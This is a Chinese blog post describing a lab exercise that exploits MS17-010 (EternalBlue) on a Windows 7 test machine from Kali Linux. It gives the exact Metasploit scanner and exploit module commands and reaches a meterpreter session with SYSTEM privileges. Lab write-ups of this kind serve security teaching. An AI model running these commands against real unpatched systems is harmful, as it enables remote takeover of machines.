永恒之蓝攻防实验

本文讲述了永恒之蓝漏洞的背景,攻击原理,以及如何使用KaliLinux进行MS17-010漏洞扫描和利用的过程,强调了及时更新系统和网络安全的重要性。
摘要由CSDN通过智能技术生成

 简介:

   永恒之蓝(EternalBlue)是一个由美国国家安全局(NSA)开发的漏洞利用工具,用于攻击运行Microsoft Windows操作系统的计算机。这个漏洞利用工具最初在2017年被“Shadow Brokers”组织泄露,并引发了全球范围内的恶意软件攻击,特别是“ WannaCry ”勒索软件攻击。

    EternalBlue漏洞利用了Windows操作系统的一个SMB(Server Message Block)协议的漏洞,允许攻击者远程执行恶意代码,而无需用户的交互或权限。攻击者可以利用这个漏洞在受感染的计算机上安装恶意软件、窃取数据或者进行其他恶意活动。

    这个漏洞的危害性非常严重,因为它影响了大量运行Windows操作系统的计算机,尤其是那些没有及时安装安全补丁的系统。微软公司已经发布了针对EternalBlue漏洞的安全补丁,建议用户及时更新他们的系统以保护其免受潜在的攻击。

    尽管安全补丁已经发布,但EternalBlue漏洞依然是一个重要的安全威胁,因为仍然有许多未更新的系统容易受到攻击。因此,网络安全意识和实施安全最佳实践对于防范此类攻击至关重要。

主机信息

攻击机:kali

实验机:windows 7

确保攻击机和实验机在一个网段

用kali扫下win7的ip

用kali打开msfconsole查看漏洞信息

search ms17_010

auxiliary/scanner/smb/smb_ms17_010

这个模块的作用是扫描目标网络中的主机,检测是否存在 MS17-010 漏洞。如果发现受影响的系统,这意味着攻击者可以利用该漏洞执行恶意代码,从而获取对系统的远程访问权限。

漏洞利用

use 3 选中该模块

show options 查看模块的可配置选项

这边显示我们可以指定一个ip去扫描,然后run执行

set RHOSTS 10.4.7.137

针对目标IP地址 10.4.7.137 上运行的Windows 7 系统进行了MS17-010漏洞扫描,结果显示目标主机很可能对MS17-010漏洞存在漏洞

再次指定ip 选中这个模块,exploit攻击

use exploit/windows/smb/ms17_010_eternalblue

set RHOSTS 10.4.7.137
exploit

WIN!

看到meterpreter已经利用漏洞进到了对方主机

看下现在的权限

getuid

system!最高权限

shell进入对方的命令行

给实验机创建一个niuma文件夹到桌面上

mkdir C:\Users\administrator\Desktop\niuma

可以创建

  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值